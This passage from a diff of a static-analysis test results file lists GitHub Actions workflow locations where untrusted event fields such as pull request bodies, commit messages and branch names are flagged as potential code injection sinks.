github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | @@ -697,62 +756,3 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | -#select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | -| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | -| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | -| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | -| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name 